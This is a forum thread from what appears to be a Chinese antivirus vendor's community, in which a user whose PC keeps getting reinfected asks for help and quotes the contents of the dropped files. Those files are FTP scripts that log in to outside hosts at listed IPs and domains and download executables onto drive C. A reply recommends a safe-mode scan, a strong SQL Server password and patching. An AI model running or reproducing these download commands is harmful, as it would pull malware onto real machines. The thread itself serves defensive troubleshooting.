瑞星卡卡安全论坛

大家好 ，我的电脑每天被这几个病毒骚扰，装了瑞星V16和瑞星防火墙 也全盘扫描杀过毒，可是每次电脑重启后不一会就会有几个程序写进来，请大家帮忙分析下我把程序用记事本打开后的内容：1    open ftp.54my.netadmin
123456
get 3389.exe c:\s3389.exe
bye

2    open 61.129.45.208
7788
7788
get f.exe c:\stf.exe
bye 


3    open 61.129.45.208
7788
7788
get f.exe c:\stf.exe
bye


4      open 222.186.15.15
110
110
get 1.exe C:\DOCUME~1\s1.exe
bye

程序文件名见图  还有个文件叫hex3603721.exe    jlguaji.exe  也杀不掉 任务管理器里也关不掉  FTP服务器也能链接过去 （可是以上IP是不是假IP啊，我在路由器里禁止了以上ip 可是电脑开机后还是能重新植入病毒程序 ，

用户系统信息：Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0

附件: Snap1.jpg

附件: 2.JPG

附件: 3.JPG

附件: 4.JPG

附件: 5.JPG

扫描SRENG日志来看，不排除网内其他电脑影响

jlguaji.exe  从名字上看可能是“精灵挂机”的意思，网上也有直接称为“叽哩瓜叽”。利用它挂机来实现某种目的。:kaka6:

进入安全模式下，使用瑞星杀毒软件全盘查杀一下试试。

系统安装sqlserver了吧，建议sa设置强密码，打全系统补丁及sqlserver补丁。